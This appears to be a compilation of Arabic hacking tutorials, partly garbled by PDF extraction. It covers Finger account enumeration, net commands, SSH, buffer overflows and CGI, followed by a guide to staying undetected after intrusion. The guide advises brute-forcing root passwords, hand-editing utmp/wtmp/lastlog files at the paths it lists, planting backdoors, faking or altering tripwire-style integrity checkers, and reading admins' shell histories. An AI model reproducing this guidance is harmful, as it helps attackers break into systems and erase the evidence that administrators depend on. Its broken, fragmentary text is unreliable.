المستخدم البعيد) ( remote userيمكن أن يرسل طلب إلى Fingerديمون يجري على نظام معين
)بورت Fingerنوعية (79وسيحصل على إجابة.
57
إضافة إلى هذه المعلومات ,في أغلب الحيان الجابة تخبرك أيضا من الذي يدير النظام) (adminوكيف قام
بالتصال.
قديما استخدم الناس التصال على جميع انواع النظمة في العالم وطلب الستعلم عن هذه النظمة و الـ
Fingerكان يعطيهم معلومات عن
من هم الموجودون في النظام وهل لهم حسابات في هذا النظام.وكان Fingerيستخدم قديما في
الجامعات و الشركات الكبيرة أيضا.
الخلصة المقدمة :ان خدمة Fingerكانت قديما ولزالت تستخدم لجلب المعلومات عن
المستخدمين الموجودين في النظام و هل لديهم حسابات في هذا النظام ام ل .
ملحظة :النظام) ( serverهو جهاز كمبيوتر تخزن فيه معلومات هائلة ويستخدم في استضافة المواقع
1.3استخدام Finger
>=================<
--توضيح--
Telnet(client) --------request-------> Finger Deamon(in Server) o
58
بعد ذلك سيظهر لك برنامج telnetو منه تطبع الوامر .
اما من يونيكس
لسنا بحاجة إلى أن نستعمل تيلنت لنه يوجد بنظام لينوكس زبون)(clientخاص بخدمة Finger
Deamon
مرّكب على النظام بشكل دائم تقريبا.
ملحظة :::سيكون الشرح التالي حتى نهاية الدرس لمستخدمي لينوكس أما أذا قررت الستمرار بأستخدام
وندوز ستكون كتابة الوامر في موجه الدوس ثم في التلنت وستكون كتابة الوامر نفسها الوامر التي
تنكتب بأستخدام نظام لينوكس ولكن بدل "@" نضع "مسافة ثم "wwwفي الوندوز مراعيا اسم الموقع
مثل يكون كتابة الوامر في لينوكس هكذا :
finger@anyname.com
ولكن في وندوز سيكون هكذا :
/finger http://www.anyname.com
لحظ المسافة بين fingerو www
اطبع في محث الوامر في يونكس ) على افتراض انك تستخدم : ( unix shell
finger@foobar.com
لحظ ان الهدف )الموقع المرادالستعلم عنه مثل معرفة من هم مستخدمينه ( هنا هو
/http://www.foobar.comكمثال
فستظهرالنتائج:
إذا كنت تريد المزيد من المعلومات عن مستخدم معّين ) Johnson Peterبيتر جونسن
59
على سبيل المثال( أدخل المر التالي:
finger johnson@foobar.com
لذلك يجب عليك ان تكون قائمة بكلمات السر في ملف نصي ) wordاو المفكره(
وحاول ان تكون كلمات السرقريبة من أسماء المستخدمين وإذا لم تعمل القائمة
استخدم برنامج - bruteforceأنصحك بهذا الوقت ان تحظر لك كأس شاهي وتأخذ لك استراحة
وتجعل البرنامج يعمل عمله-
بالطبع نجد بعض الحسابات للمستخدمين للنظام اكثر اهمية من غيرها من الحسابات.
وخاصة حساب الدارة ) (Adminأو الجذر) (rootبسبب انه عندما تعرف الباسوورد الخاص بهم
وقتها تستطيع التحكم بالموقع .وبالطبع بعض الحسابات سهلة تخمين كلمة السر .
هناك بعض الخدع لمعرفة هذا النوع من الحسابات .على سبيل المثال
إطبع المر:
finger secret@foobar.com
finger .@foobar.com
finger 0@foobar.com
60
=============<
إذا أردت ان استخدم خدمة ) Fingerمعنى Fingerكفعل "ألمس" ولكنها تأتي هنا بمعنى "استعلم"(
والستعلم عن موقع معين مثل هذا""www.victim.com
وأيضا تعرف أن موقع آخر " "www.host.comيقدم خدمة Fingerتعمل،
عندها يمكنني ان أقدم طلبا مثل هذا):اكتب في محث الوامر مثل هذا(
finger@host.com@victim.com
يعني الخلصة :ان الموقع الذي تريد الستعلم عنه يعتبر حاسوبك الشخصي غير موثوق به بعكس
اذا كان الستعلم عن طريق موقع اخر يشابهه فسوف يسمح له !.
انتهى،،،
61
" شرح مختصر لدارة الشبكة بإستخدام المر " NET
تستخدم العديد من الخدمات أوامر شبكة التصال التي تبدأ بالكلمة .netتملك
أوامر netهذه بعض الخصائص المشتركة:
يمكنك مشاهدة قائمة بكافة أوامر netالمتوفرة بكتابة ? net /في موجه
الوامر.
يمكنك الحصول على تعليمات بناء الجملة في سطر الوامر لمر netعن طريق
كتابة net help commandفي موجه الوامر .على سبيل المثال ،للحصول
على تعليمات المر ،net accountsاكتب مايلي:
net help accounts
تقبل كافة أوامر netخيارات سطر الوامر ) /yنعم( و ) /nل( .على سبيل
المثال ،يطالبك المر net stop serverبتأكيد رغبتك في إيقاف كافة خدمات
الملقم التابعة ،بينما يتجاوز ،net stop server /yعن طريق الجابة بنعم
تلقائيًا ،المطالبة بالتأكيد ويعمل على إيقاف تشغيل خدمة الملقم.
إذا كان اسم الخدمة يحتوي على فراغات ،استخدم علمات القتباس حول النص
)أي .("Service Name " ،على سبيل المثال ،يشّغل المر التالي خدمة net
:logon
"net start "net logon
62
ن بتسجيل الخروج من شبكة التصال فورًا.
63
64
الوصف
لقم.
net file /clلزالة التأمين وإغلق الملف .إن إخراج net fileمشابه لمايلي:
65
احد بالعلمة النجمية )*(.
66
67
جال )على سبيل المثال.(Sales\Ralphr ،
68
انتهى،،،
69
و لنبدأ الن الحديث عنها ::
ما هى ال SSh؟
===============
ال secure shellهى اداه )برنامج( للتصال و الدخول الى كمبيوتر او جهاز اخر على النت ورك لتنفيذ
اوامر او مهام معينه داخل هذا الجهاز اى و هو التصال عن بعد remotely connectionو تستخدم
ايضا فى نقل الملفات من كمبيوتر الى اخر و هى تقدم توثيق قوى و اتصال امن جداا فى قنوات التصال الغير
امنه و هى تعتبر كبديل جيد جداا لدوات تستعمل لنفس الغرض فى يونكس مثل )rlogin,rsh and
.(rcp
و تقدم ايضا ال secure shellاتصال امن جداا لشحنات اتصالت ال tcpكونيكشن .
لماذا يفضل استخدام ال secure shellعلى الدوات الخرى التى يطلق عليها r- commandsفى
يونكس ==================================================
======================================
كالمذكورين فى العلى ؟
======================
فى توزيعات اليونكس مثل ال * BSDتتعرض الدوات التى يطلق عليها r- commandsمثل )
(rlogin,rsh and rcpالى انواع مختلفه من الهجمات حيث انه لو شخص استطاع ان يكتسب ال روت
اكسيس ) (root accessللجهزه التى على الشبكه بطريقه ما او فعلها ن طريق اتصال فيزيائى اى
ريموتلى يمكنه ان يدخل الى كل بيانات الجهزه التى على الشبكه بدون ادنى صعوبه لنه يستطيع بالروت
اكسس ان يعبر من خلل اى اداه من المذكوره فى يونكس بدون اى صعوبه و يمكنه تفاديها بطرق معينه و
هذا ما يسمى بأن الشخص لديه unauthorized access to systemsاعتقد انكم فهمتونى الن و
يمكن ايضا لى شخص ان يراقب و النت ورك ترافيك و يلتقط كل الباكيدجس من خلل شبكتك و تكون هذه
الباكيدجس تحتوى على الباسوردس للسيستم حق شبكتك
ملحوظه :طريقه مراقبه النت ورك ترافيك هى طريقه حقيقيه فى الختراق و تستخدم فى اختراق المنظمات
الكبرى و تقع تحت بند تقفى الثر و العداد للختراق (
و الن نعود الى السيكيور شيل و مزايا السيكيور شيل تظهر هنا مع كل عيوب الدوات فى يونكس فالسيكيور
شيل يطالب الشخص الذى لديه الروت اكسس ايضا بأن يتصل اتصال موثوق عبره اى ل يعطيه الحق للدخول
الى بيانات اجهزه الشبكه ال بالباسورد و ل يمكن التحايل على ال sshفى هذه النقطه و بذلك حتى لو تمكن
الشخص من اكتساب الروت اكسس لن يستطسع الطلع على بيانات الشبكه
ال ب . authorized access to systems
و النقطه الثانيه هى ان اذا حاول احد اختراقك عن طريق مراقبه النت وررك ترافيك لشبكتك و التقاط
الباكيدجس التى تحمل معلوماتك و باسورداتك فسيخيب امله لن السيكيور شيل ل يرسل الباسوردات فى
صوره واضحه كما ترسلها ادوات يونكس الخرى و لكن يرسلها مشفره و لذلك سيكون على المخترق
محاوله فك الشفره و الخ
و لكن مع كل هذه المزايا لم يخلى ال secure shellمن الثغرات و لكن تعتبر ثغراته قليل و تقريبا
معظمها يحتاج الى الرووت اكسس و الخرى يمكن ان تخترق السيكيور شل فقط بها )هذا كلم بينى و بينكم(
70
===========================================
-1تحمى من ال ip spoofingاى تحمى من انتحال عنواين الى بى حيث انه لو ارسل شخص ما
باكيدجس من اى بى يظهر انه موثوق به و لكنه فى الحقيقه ليس موثوق به يكشفه ال sshو تحمى ايضا
ال sshمن المنتحلين على الشبكه المحليه اى . localy
-3تعترض ظهور التيكستس التى يكون مخزن عليها الباسوردات الواضحه و بيانات الهوستس
-4تحميك من معالجه البيانات المخزنه اى تمنع اى شخص غير موثوق به من عمل ايديت لى داتا مخزنه
و لكن مع كل هذا فأن ال sshليس امن بدرجه كبيره حيث ان الشخاص ذو خبره كبيره فى النت ورك
يستطيعون ان يجعلون ال sshينقطع عن التصال اى disconnectedو لكن ل يمكن ان يكسرو تشفير
بياناته او يعيدون تشخيل الترافيك الذى كان ينقلها .
و ايضا كل الشياء التى تكلمنا عنها فوق سوف تعمل فقط اذا كنت تستخدم خاصيه التشفير التى تسمح لك بها
ال sshو هى تسمح بأكثر من نوع تشفير مثل )three-key triple-DES, DES, RC4-128,
(TSS, Blowfishيمكنك استخدام ما تريد منهم و ايضا هناك اوبشن اى خيار فى الداه تسمح لك بعدم
تشغيل التشفير اى" encryption of type "noneو بهذا تجعلنى اقول عليك احمق ! لن هذا يجعل
ال sshسهله الختراق مثل الدوات التى تم ذكرها فى اول الموضوع فى يونكس ,حيث ان هذا التشفير
ايضا يمنع ال ip spoofingو ال DNS spoofingو هذا ايضا بالضافه الى تغيير مفاتيح فك التشفير
كل فتره معينه و يتم تدمير مفاتيح التدمير التى تم استعمالها تماما .
اذن فهى اداه حقا مميزه و تستحق الحترام و الهتمام مع انها ل تخلو من الثغرات و لكن لنجعلها افضل ما
موجود فى هذا المجال
ارجو ان اكون قد افدتكم فى هذا الدرس بالتعرف على اداه مثل السيكيور شيل و ارجو ان اكون عند حسن
ظنكم.
انتهى،،،
>ةةةةةة<LAMeR :
اقدم لكم درس يشرح ما معنى الـ .. Buffer Overflowsوانشال تستفيدون منه
يله نبدأ
71
محتويات الدرس:
-2المعالجه)(Proccess
<-----------------
Buffer Overflowحالة تحدث لبرنامج بسبب برمجة سيئة أو بمعنى اخر برمجة تحمل أخطاء.
احدث ثغرة يمكنك أستغللها من نوع Buffer Overflowتسمى فايروس ' ، 'code redالتي أستغلت
في خادم IISلمايكروسوفت - MS web server-
عموما ،يحدث Buffer Overflowعندما يظهر برنامج ما متغّير بحجم ثابت )على سبيل المثال،حجم 20
صصت إلى هذه المتغّير أكبر من حجم المتغّير.
بايت( و القيمة التي خ ّ
somevalue2avalusabcabcabc
abcabcabcabcabcabc
><var1 ><var2><vname ><other things go here
اذا ماذا حدث ؟؟ المتغّير " vnameطفح "overflowedبسبب البيانات المدخلة عليه من قبل المستخدم
72
و قيمة " other things in memoryأشياء اخرى في الذاكره" تغّيرت بسبب فيض)(overflow
الحروف من ادخال المستخدم.
-2المعالجه):(Proccess
<>----------------
ن الوحدة الوظيفية الساسية في حاسوب يعمل هي عملية المعالجه ).(Proccessفي الحاسوب هنالك إّ
العديد من العمليات ونظام التشغيل مسؤول عن تقسيم القّوة التي تجعل العديد من العمليات تعمل في نفس
الوقت في الحاسوب.
ن وحدة المعالجة
ليس هناك شيء إسمه "متعددالعمليات "Multi- proccessesصحيح ...كيف اذن؟؛ ا ّ
المركزية) (CPUتنتقل بين العمليات كُل على حده بسرعة كبيره بحيث تبدو مثل العديد من المهام التي تعمل
في وقت واحد،
اذا تبدو لنا كأن العمليات تعمل في وقت واحد وهذه من خدع الحاسوب التي يؤديها علينا .. (:
كّل عملية لها عنوان فاضي من الذاكره ،وليمكن لي عمليةآخرى تدخل في هذا المكان الفاضي من الذاكرة.
وهذا يرشدنا الى شي اخر يجب ان تفهمه وهو:
توضيح .:ان الذاكرة ل تنقسم الى ذاكرة حقيقة وذاكرة افتراضية بل أنهما ينتميان لذاكرة واحد
اذن ما فائدة التسمية الى حقيقية وافتراضية ؟؟ الجواب هو للمتييز فقط ،حيث ان الذاكرة الحقيقة تمثل
مساحة معينة من القرص الصلب )ومكان هذه المساحة في تغير مستمر( لذلك سميت حقيقية او بمعنى اخر
طبيعية )اي بأستطاعتك لمس مكان الذاكرة الطبيعية بيدك على القرص الصلب(
وفائدة الذاكرة الفتراضية هي إعطاء عنوان افتراضي )غير حقيقي ( للذاكرة الحقيقية اي يعطي عنوان كأسم
فقط لمكان مساحة الذاكرة الطبيعية في القرص الصلب ،وإن تغير مكان المساحة المخصصة للذاكرة يظل
العنوان الفتراضي)التخيلي( ثابت.
73
كيف نستفيد من الذي قلنا عن المعالجة وإدارة الذاكرة للوصول والدخول الى الجذر ) (Rootوأختراق
النظام؟ تذّكر نحن قلنا في وقت سابق بأّنه عندما يكون الدخال)البيانات( من المستخدم أكبر حجما من الذاكرة
صصت لهذه البيانات ،البيانات الزائدة ستفيض ) (overflowفي الذاكرة التي بعد السم المتغّير؟ هذا التي خ ّ
المكان من الذاكرة هو المكان الذي نستفيد منه في الختراق.
ماذا نعمل في ذلك المكان :داخل خط )مكان( البيانات التي يدخلها المستخدم )في المثال السابق وهو السم
الول الذي يطلب من قبل البرنامج ثم أدخلناه ( نضع الوامر الكثر شعبية للحاسوب ،حيث هذه الوامر تجعل
الحاسوب يحدث)ينتج( هيكل نستطيع استخدامه فيما بعد للقيام بالسيطرة الكاملة للنظام المستغّل .القيام بهذا
العمل ليس بيسطا كما يبدو لك ،إذن لو أردت معرفة كيف يعمل ،أنت يجب أن تقرأ المقالة القادمة حول
،Buffer Overflowsالذي سيصف بالضبط كيف لستغلل واحده من الـ Buffer Overflowsفي
الختراق.
اخيرا اتمنى انكم فهمتوا الدرس زين وعرفتوا ايش معنى Buffer Overflowواللي فهم الدرس نص
نص يعيد قرائته اكثر من مرة مع التدقيق وانشال يفهم.
انتهى،،،
>ةةةةة<
في هذا الملف سوف نقوم بعرض مقدمة الـ CGIو علقتها بالنترنت
74
) (1مقدمة للـ CGI
الـ TCP/IPهو البروتوكول الذي يستخدمه سكريبت السي جي أي و السيرفر أثناء التصال .البورت
المحددة
تستطيع سكريبتات السي جي أي أن تقوم بتوليد صفحات الويب و الصور و أيضا نتائج محددة طبقا لمدخلت
معينه يقوم
-1في الخطوة الولى يقوم السكريبت بعمل معالجة أوليه للبيانات التي أدخلت له
-2في الخطوة الثانية يعمل السكريبت كقناه للبيانات التي يقوم المتصفح بارسالها الي السيرفر أو العكس
يقوم سكريبت السي جي أي بتشفير البيانات حتي تتمكن من العمل في أي مناخ للعمل
يمكن كتابة سكريبت السي جي أي بأي لغة برمجة سواء كانت لغة مجمعة مثل الفيجوال بيسك
أو لغة مترجمة مثل البيرل و الفرق الوحيد بين نوعين اللغات أن البرنامج
المبرمج باللغة المجمعة سوف يكون أسرع في التنفيذ و لكن اللغات المترجمة أسرع في عملية التطوير
75
أهم الوامر التي تعتبر وثيقة الصله لموضوعنا هي كالتالي :
POST -2هذا المر يطلب من السيرفر قبول المعلومات المدخلة اليه من المتصفح
PUT -3هذا المر يطلب من السيرفر قبول المعلومات المرسله اليه كبديل عن المدخلت الموجودة حاليا
نقاط الضعف التي يسببها سكريبت السي جي أي ليس ضعفا في السي جي أي نفسه و لكنه
السي جي أي يسمح باستغلل نقاط الضعف الموجودة و لكن هناك طرق أخري للوصول الي تحطيم النظام
المني .كمثال يمكن الوصول الي الملفات الغير محمية باستخدام الـ FTPأو .TELNET
انتهى،،،
>ةةةةةة :ةةةةةة<
76
هذا الموضوع سيجعلك تخاف من خيالك و تعمل الف حساب لظلك ..لكن انشاله سيكون دفعه للمام و ليس
لن تخاف و تتراجع
اسلوب الموضوع غريب ..و عادة ما نتجنبه دائما ..بمعنى اخر ..كل من اخواننا و اساتذتنا من كتبوا
دروسا و شروحا في اختراق السيرفرات و المواقع كان همهم الوحيد في الحمايه هو مسح اللوق log files
..لكن هل هذا يجعلك في امان تام ؟! هل هذا سيمنع تتبع اثرك ؟!! هذا ما ستكتشفه بعد النتهاء من قراءة
الموضوع ..
************************
اذا كنت تظن ان الحصول على ترجمة الثغرات ) ( exploitesباسرع ما يمكن هو ما يجعلك محترفا و
متطورا فاسمح لي بان اقول لك " انك انسان خاطئ و ان اسلوب تفكيرك غلط "
ماذا ستفيدك الثغره الحديثه جدا ) ( 0dayعندما يتم القبض عليك اذا هاجمت احدى السيرفرات الكبيره ..؟
و عندها سيتم السيطره على اجهزتك و ادواتك و مراقبتك !؟!
يمكن يرى البعض ان هذا لم بحدث قط لي شخص نعرفه ؟ او ان بلدنا ليس فيها هذه التقنيات العاليه !! لكن
هذا قد يحدث يوم ما !!
و ايضا انت لتهاجم فقط سيرفرات بلدك انما سيرفرات اخرى عالميه محميه من قبل الشرطه الدوليه ..كما
انه لبد من الحرص و فهم المور اذا كنت تريد ان تسمي نفسك هكر hackerبمعنى الكلمه
ربما تعتقد في نفسك انك اكبر من قراءة هذا الموضوع بكثيير لنك من المعروفين عنهم بالحتراف او انك
ترى ذلك في نفسك ..لكن انا اؤكد لك بانك مخطئ و انت تحتاج لقراءة الموضوع الي النهايه
************************
الموضوع مقسم الى 8اجزاء :
=================
الجزء الول :المقدمه ) و هو ماقد قمت انت بالنتهاء من قرائته حاليا (
الجزء الثاني :المور العقليه و كيف تصبح **" " Paranoidهذا الجزء سيتم عرضه من خلل هذه
المواضيع :
-الدافع او الحافز
-لماذا ان لبد ان تصبح " " Paraniod
-كيف يمكن ان تصبح " " Paranoid؟
-و كيف تحافظ على اسلوبك الجديد او شخصيتك الجديده ؟!
** متاكد ان معظمكم يتسائل عن معنى هذه الكلمه ..سيتم توضيح معناها و مفهومها مع شرح هذا الجزء
انشاله .
الجزء الثالث :الساسيات التي يجب عليك معرفتها قبل ان تقوم باي عملية اختراق ) و سيتم عرضها من
خلل النقاط التاليه (
-تمهيد
-امن نفسك
-حسابك الخاص
-ملفات اللوق LoGs
-ل تترك اي اثر
-امور و اشياء يجب تجنبها و الحظر منها
الجزء الرابع :التقنيات الحديثه الي يتي يجب ملحظتها ) و سيتم عرضه من خلل النقاط التاليه (
-تمهيد
-امنع تقفى اثرك من اي نوع
-ايجاد اي نوع من انواع ملفات اللوق lOGsمهما كان فيها من تلعب ..
-تحقق من syslog configuration and logfile
-تحقق من نوعيات برامج المن المثبته
-تحقق من وجود المدراء Admins
-كيف يمكن تصحيح checksum checking software
-حيل المستخدم المنيه
77
الجزء السابع :قائمه بافضل البرامج للتخفي و الختباء
الجزء الثامن :كلمه ختاميه ........ارجو ان تتابعو الموضوع بحرض و تركيز شديدن من الن !!! ...
************************
الجز الثاني :
=======
-الدافع و الحافز :
*************
لبد من تحكيم العقل للنجاح في اي عمل ..العقل هو القوه التي ستدفعك و تحفزك لتصبح انسان واقعي ..
مسئول و حريص
المخترق ) ( Hackerالناجح لبد و ان تتوفر فيه هذه المبادىء و المكانيات العقليه ..مثلها مثل بناء
عضلت الجسم لن يكبر الجسم و يتقسم ال بعد ممارسة الرياضه الخاصه بذلك ) على سبيل المثال (
مهما كنت متمرس او لديك الكثيير من المعلومات لبد اخذ اشد الحتياطات و الحذر قبل القيام باي شئ
78
اذا ما قد ذكرته ل يهمك و انك انسان غير مبالي ..دعني اسألك هذه السئله ؟
هل تريد ان يراك الخرين مجرم ؟ هل تريد ان ترى الحزن و الدموع على وجه اهلك ؟ هل تريد ان تحسر
قلوبهم عليك ؟!
هل تريد ان تفقد اصدقائك ؟ خطيبتك ؟ صحبتك ؟
تذكر ان الضرر لن يعود عليك فقط انما سيعود على كل من تعرفه
اذا كنت لتقوم بعمل اي اتصالت هاتفيه مع اي شخص من الهاكرز او الكراكرز ..ول تبعث اي ايميلت فيه
معلومات مشبوهه و ل تمتلك اي معلومات امنيه و حساسه على جهازك فهذا ببساطه ل يشكل اي خوف لنه
ببساطه ايضا انت لست مخترق او (= hacker
لنه لبد من وجود اتصال بينك و بين اصدقائك المهتمين بهذا المجال ..لتبادل الخبار و الفكار ..
كما انه لبد و انك تمتلك بعض الملفات اللزمه للختراق او بعض المعلومات الي تعبر مدينه لك في حالة
حدوث رصد لجهازك ) كبسه (
>--
<--
لتشفير الملفات بشكل فردي ) ملف بملف ( اليكم هذه البرامج ) الكثر شهره و الحسن اداء ( :
79
PGP v2.6.x -
يمكنك ايضا تشفير عملية اتصالك ب ) Unix Systemعلى اساس انه ممكن ان تكون مراقب (
و ذلك باستخدام :
SSH -المن حتى الن
DES Login -
اجعل كلماتك السريه صعبة التخمين ..غير منطقيه ..غير شائعه ..ل توجد في القواميس ..لكن في نفس
الوقت لبد ان تتذكرها دائما
اخترها من كتاب تتمتلكه ..اجعلها اكبر عدد ممكن من الحرف ) يعني عادة عند عمل اي اشتراك يطلب منك
كلمه سريه تتكون من 8- 4احرف ( فاختر ال 8حروف
ل تحفظ ارقام هواتف اصحابك الهاكرز بشكل اعتيادي ..انما يمكنك بان تشفرها ) حتى برموز تفهمها انت
فقط ( و اتصل بهم من هواتف الشارع او من العمل ..
اذا انت بالفعل متعمق جدا في الهاكينج فلبد من تشفير كل شئ يتعلق بهذه المور !!
احفظ دائما نسخه احتياطيه من معلوماتك على CDاو HDو بالطبع تكون مشفره حتى اذا خسرت
المعلومات الموجوده على جهازك يكون لديك نسخ احتياطيه
لتحتفظ بملفات لتحتاجها ..و ان كان لديك document filesاو ملفات مطبوعه و ل تريدها مرة اخرى
لتقطعها اعتياديا انما احرقها في مكان بعيد كل البعد عن اماكن تواجدك العتياديه او ان اردت الحتفاظ بها
فعليك كتابتها من جديد باسلوب مرمز او مشفر ليعرفه ال انت !!
>----
ملفات اللوق : LoGS
============
80
هناك 3ملفات مهمه جدا :
WTMP -للتسجيل عند الدخول و الخروج ) ( log on/off - log in/logout + tty + host
UTMP -للمتواجدين اونلين حاليا !
LASTLOG -تسجيل من اين جاءت هذه logins
** سنتكلم عنهم باستفاضه و تعمق فيما بعد ) في جزء اخر من نفس الموضوع (
كل عملية دخول بواسطة ال telnet , ftp , rloginيتم تسجيلها في هذه الملفات ..لبد حذف دخولك من
هذه الملفات و ال سيتم معرفة التي :
-ماذا قمت بالختراق !!
-من اي مكان انت قادم
-كم من الوقت بقيت اونلين ..
خطا يقع فيه الجميع بنسبة % 99.9مننا ) حتى انا كنت اقع في نفس هذا الخطا زمان ..لكن اتعلمت ( و
هو انك تمسح اللوقات logfiles
علطول ..هذا مجدي في حالة انك لتهتم بان يعرف الدمين انه هناك مخترق ما قد دخل على النظام ..اما اذا
اردت ان تشتغل شغل المحترفين عليك الدخول و الخروج دون ان يلحظك اي شخص ..دون ان تقوم بتغيير
اي شئ يلفت انتباه مدير النظام
و لعمل ذلك تابع معي :
لتعتمد البرامج التي روجت على انها لتقوم بمسح اللوق انما تقوم بحذف دخولك فهي غيير مجديه مثل
برنامج ZAP (or ZAP2
لنه يقوم بعمل اصفار كاخر لوق مكانك انت و هذا ايضا دليل على وجود خطا سيلحظه مدير النظام
اذا عليك بالقيام بذلك يدويا ..
عادة لبد ان تكوت rootلتغير و تعدل في ال ) log filesباستثناء بعض التوزيعات القديمه جدا (
اماكن تواجد ملفات اللوق ) defaultتختلف باختلف التوزيع (
UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log
و في بعض النسخ القديمه $home/.lastlog
81
-امور و اشياء يجب تجنبها و الحظر منها
======================
لتقوم ابدا بكسر اي باسورد ال على encrypted partitionكما عليك دائما انت تحذر من استخدام
اشتراكاتك ) اشتراك الجامعه على سبيل المثال (
لنه بمنتهى البساطه يمكن ان يرى ماتفعله مدير الشبكه adminو من ثم سيعرف مالذي تقوم به و الملفات
التي تستخدمها الخ ..
حاول دائما ان تغيير اسامي البرامج المشبوهه لديك يعني احنا العرب خصوصا غاويين نسمي اسماء اسامي
مخيفه على الفاضي ..
لتفكر في نفسك فقط ..يعني حين ان تستخدم بعض الشتراكات او ال shellsالتي تسمح بالعمل الخلفي
backgroundلبد ان تعرف انك تبطئ من سرعة السيرفر و بالتالي تلفت النظار !!!
حاول ان لتستخدم parametresعلى قدر المستطاع ...على سبيل المثال اذا اردت ان تتصل من الشيل
على تيلنت لموقع معين او سيرفر معين لتقوم بعمل التي telnet http://www.host.com/ 23 :
انما ببساطه اتبع الخطوات البطيئه و هي
telnet
open
/http://www.host.com
و هكذا ..
في حالة انك اخترقت سيرفر معين من الفضل ان تضع عليه backdoorsمخصصه لنظام التشغيل ) مش
sub7هههههههههه ( و هي كثييره و موجوده مجانا على النترنت
* من الطبيعي ) العادي ( ان يسهل على مدير الشكبه ) ( adminمعرفة النظام الذي كان المخترق عليه
عند دخوله على شبكته و ذلك اما عن طريق ملفات اللوق ) هذا ان كان الهاكر غبي لتركها كما هي ( او من
ال outputمن ال sniffer
او من اوامر netstatفي حالة ان المخترق مازال موجودا online
من اجل هذا تختاج ال !! GateWay Server
82
serverلنه سيتغير اثرك بتغير الشركات المختلفه التي تتصل من خللها
بالنسبه للمتواجدين في الوليات المتحده المريكيه و اوروبا ) الدول المتقدمه ( حتى و ان قمت بما سبق )
( dialup serversيمكنهم تسجيل كل اتصال تم و لديهم ارشيفات منذ سنيين هذا عددها !
-ايجاد اي نوع من انواع ملفات اللوق lOGsمهما كان فيها من تلعب ..
**************************************************
***
من الهام و الضروري جدا ان تعثر على كل ملفات اللوق حتى المخفي منها ..للحصول و العثور على هذه
الملفات يمكن ذلك بهاتين الطريقتين :
- 1اعثر على جميع الملفات المفتوحه :و يمكنك ذلك باستخدام برنامج LSOFهو اختصار List Open
Filesو من ثم يمكن العثور عليهم و التعديل فيهم
- 2ابحث عن كل الملفات التي تغيرت ) حدث فيها تغيير ( من بعد دخولك -
بعد دخولك قم بعمل touch /tmp/checkو بعدها قم ""find / -newer /tmp/check -print
العمليه التي سنقوم بها ستاذخ الشكل التالي :بحث <-نتائج <-مطالعة النتائج <-تعديل
قم ايضا بالتشيك على اماكن ال log filesالعتياديه /usr/admو /var/admو /var/log
اذا يتم تسجيل العمليات في ال loghostيعني xx@loghostفانت هنا في مازق ..حيث انه لبد من ان
تخترق ال loghostلتعدل ملفات اللوق
يمكن تعديل اللوق logfilesبعدة طرق ابسطها باستخدام اي محرر كتابه text editorاو قم بعد اسطر
الملف باستخدام wcو من ثم حذف اخر 10اسطر من خلل "head -LineNumbersMinus10" :
بالعربي ) عدد السطور مطروحا 10منه( head -
اذا كان برنامج accoutingمثبت على السيرفر يمكنك ببساطه استخدام acct-cleaner from
zhartو هو هيعمل اللزم
اذا كان النظام يستخدم wtmpxو utmpxايضا فمع السف عزيز انت في ورطه !!! فانا على اعرف اي
برنامج للتعامل في هذه الحاله ..لو استطعت ان تبرمج واحد ) للخوه المبرمجين ( ل تنسى ان تعلنا به =(
83
-تحقق من نوعيات برامج المن المثبته
******************************
توجد العديد من برامج الفحص المني غالبا على المواقع ذات الحس المني العالي .وتدار هذة البرامج
بواسطه أداه تسمى cronو يكون مكانها الفتراضي أو الطبيعي هو /var/spool/cron/crontabsو
هي تقوم بمتابعه جميع المدخلت .خاصه الـ Rootو الملفات التي يستعملها .للتحقق اللسريع من
الموضوع نستخدم المر التالي
"."crontab -l root
غالبا ماتكون هذه الدوات محمله و عامله على حساب المدير .و يكون بعضها في مجلد الـ ~/binالخاص
به .كما يمكن ان يكون هناك sinneferموضوع لغراض امنيه في نفس المكان.
من الدوات الت تستعمل في مثل هذه الفحوصات الداخليه
,tiger, cops, spi, tripwire, l5
.binaudit, hobgoblin, s3 etc
ينبغي على المقتحم أن يتأكد من وجود هذه الدوات و التأكد من التقارير التي ترسلها ,للتأكد من أنها ل
تكشف عمليه القتحام
يمكنك تعديل مفات هذه البرامج للتأكد من أنها لن تقوم بالبلغ عن القتحام ,و يمكن تنفيذ ذلك بطريقتين:
-قم بتعديل البرنامج برمجيا لكي ل يقوم بالبلغ عنك )واسعه شويه دي( أو قم بأزالته و أستعمل برنامجا
مزيفا
-قد تضطر إلى أزاله الـ back doorالذي أستعملته و محاوله تحميله بطريقه أخرى
-تحقق من وجود المدراء Admins
****************************
من المهم أن تجد جميع المدراء على الموقع ,و تحاول معرفه الحسابات العاديه التي يتم أستخدامها.
توجد عده طرق لكشف هذه المعلومات:
-قم بفحص الملف forword.و مدخلت الـ alias
-أفحص ملف الـ sulogو حدد المستخدمين الذين نجحو في تنفيذ المر su rootبنجاح
-أسحب ملف الـ groupو أبحث عن جميع المجموعات التي لها علقه بالداره ) admin, root,
wheel, etc
-أسحب ملف passwdبالنسبه للمدير لعرض كلمات سر المدراء
يعد كل هذا ,يمكنك معرفه كل المدراء على الموقع .أدخل إلى مجلداتهم الخاصه ) في حاله عدم أستطاعتك ,
أستخدم أحدى الدوات التاليه chid.c, changeid.cلنتحال شخصيه المستخدم( .و أفحص الملفات
التاليه history/.sh_history/.bash_historyلمعرفه الوامر التي يستعملونها عادة ,قد يفيدك هذا
في معرفه دور المدير على الموقع ,أو أكتشاف معلومات مخفيه .قم بفحص ملفات .
profile/.login/.bash_profileلمراجعه أعدادات الـ aliasالتي تستخدم ,و إذا ماكانت أدوات أمنيه
خفيه مستخدمه .و من الطبيعي طبعا أن تقوم بفحص كافه الملفات و المجلدات ,خاصه المخفيه منها قد تجد
بعض الشياء المفيده حقا
بعض المدراء ويقمون باستعمال برامج للتحقق من حدوث اي تغييرات في الملفات ،وفي حالة حدوث اي
تغير ،يقوم بفحص الملفات ويستطيع اكتشافها
فكيف تعرف مااذا استخدمت هناك برامج التحقق واي النواع استخدمت؟ واذاعرفت فكيف تعدلها بحيث تخدم
من اجلك ؟
هناك انواع عديدة من برامج التحقق ومن السهل كتابة واحدة منها بنفسك ولكن من الصعب اكتشاف ما اذا
استخدمت مثل تلك البرامج علي الملفات للحماية
هذه اسماء بعض البرامج التي تقوم ب عملية فحص checksum
84
SOFTWARE : STANDARD PATH : BINARY FILENAMES
tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire
binaudit : /usr/local/adm/audit : auditscan
